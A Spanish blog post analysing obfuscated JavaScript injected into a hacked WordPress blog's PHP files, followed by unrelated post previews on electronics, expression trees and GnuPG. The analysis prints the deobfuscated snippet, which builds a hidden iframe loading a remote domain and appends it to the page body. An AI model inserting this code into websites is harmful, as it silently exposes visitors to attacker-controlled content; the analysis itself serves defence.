Ir al contenido principal

ladenas938 en Wordpress (Script Redirector)

Recientemente han caído en mis manos unos archivos .PHP pertenecientes a un blog basado en "Wordpress". Estos archivos habían sido alterados insertando código malicioso escrito en JavaScript ofuscado para dificultar su interpretación.

Inicialmente el atacante ha infectado todos los archivos de código del blog insertando tanto al comienzo de los mismos como al final, una o varias líneas de código javascript con una longitud de unos 1800 caracteres.

Así que como tenía un rato libre me dije, a ver de qué va este pedacito de código…

El primer paso ha sido tabular el código de forma adecuada para facilitar su lectura, con lo cual han quedado unas 130 líneas de código. A continuación he realizado una primera pasada de limpieza del código eliminando todo el código inservible utilizado para la ofuscación y, finalmente con el "código bueno" entre las manos, cuya longitud era de 13 líneas de código útil se podía ver perfectamente las primeras intenciones.

Han utilizado "codificado de cadenas de texto" para dificultar su lectura, control de excepciones para realizar varios reintentos de carga de una web remota ( www [dot] ladenas938 [dot] com ), la cual era cargada en un IFRAME oculto y creado desde el propio script anexándolo al BODY del blog.

En un fin otro juguete más con el que andan enredando los del lado oscuro ¡qué le vamos a hacer!
En cualquier caso para los que queráis verlo, aquí os dejo el código limpio del script (la parte TRY):

var c = 120;
var u = "body";
var x = String( "appendChild" );
var xE = document;
var f = String("iframe");
var uS = "createElement";
var g = xE[uS](f);
var cA = String("visibility");
g.height = c;
g.width = c;
g.src = String("http://www.ladenas938.com/users/5");
g.style[cA] = "hidden";
xE[u][x](g);

Comentarios

Entradas populares de este blog

Driver L293D de Texas Instruments

El L293D de Texas Instruments es sin lugar a dudas un circuito integrado de un gran valor cuando necesitamos controlar motores de corriente continua o bipolares de pasos (Bipolar stepping motors)Es cierto que se trata de un puente en H (o medios puentes), en este caso cuádruple, que sin bien podríamos crearlo con transistores, el echo de que se encuentre integrado en un único chip es de agradecer.Capáz de conducir corrientes bidireccionales de hasta 1 amperio en el modelo L293 y hasta 600 mA en el modelo L293D y con tensiones que van desde los 4.5V hasta los 36V en ambos modelos.Por supuesto podemos utilizarlo en otras aplicaciones o para controlar otros componentes: motores de corriente continua, relés, motores de paso bipolares, solenoides en general y cualquier carga que requiera una alta corriente y tensión.Las entradas son de tipo TTL y se activan por parejas, es decir, desde la pata Enable 1,2EN, activamoslas entradas 1 y 2 y desde la pata Enable 3,4EN activamos la 3 y la 4. Cad…

Árbol binario de expresión y Notación Posfija (II)

En una publicación anterior, hablaba sobre que es la notación posfija, para que puede ser útil y mostraba un pequeño ejemplo con una expresión aritmética simple:
(9 - (5 + 2)) * 3
Pues bien, hoy voy a mostraros como podemos crear el árbol binario correspondiente para analizar o evaluar esta expresión, haciendo uso del recorrido en postorden.
Lo primero que debemos hacer es crear el árbol, respetando las siguientes reglas:
⦁ Los nodos con hijos (padres) representarán los operadores de la expresión.
⦁ Las hojas (terminales sin hijos) representarán los operandos.
⦁ Los paréntesis generan sub-árboles.
A continuación podemos ver cómo queda el árbol para la expresión del ejemplo (9 - (5 + 2)) * 3:




Si queremos obtener la notación postfija a partir de este árbol de expresión, debemos recorrerlo en postorden (nodo izquierdo – nodo derecho – nodo central), obteniendo la expresión: 952+-3x
Así, si quisiéramos evaluar la expresión, podemos hacer uso de un algoritmo recursivo. A continuación tene…

GNUPG - Instalación en Windows

Podemos descargar GNUPG para windows en su versión 1.4.9 desde aquí.El proceso de instalación de GNUPG es un proceso muy sencillo que básicamente consiste en pulsar siguiente..., instalar y finalizar. Una vez instalado estará en "C:\Program Files\GNU\GnuPG", eso si no hemos cambiado nosotros la ubicación, la cual será muy importante recordar.

Para poder utilizar cómodamente GNUPG desde la "Shell de comandos", tenemos que asegurarnos de que en la variable de entorno PATH, está añadido el path al directorio de instalación de GNUPG. Esto no es estrictamente necesario, ya que, podemos acceder al directorio de GNUPG y desde ahí ejecutar los comandos pero, personalmente recomiendo que asigneis a la variable de entorno PATH los valores correctos para poder ejecutar GNUPG desde cualquier ubicación.

Hay varias formas de modificar o añadir variables de entorno. Podemos hacerlo desde la propia shell o desde el panel de control de windows. Una forma rápida de llegar a la ventana…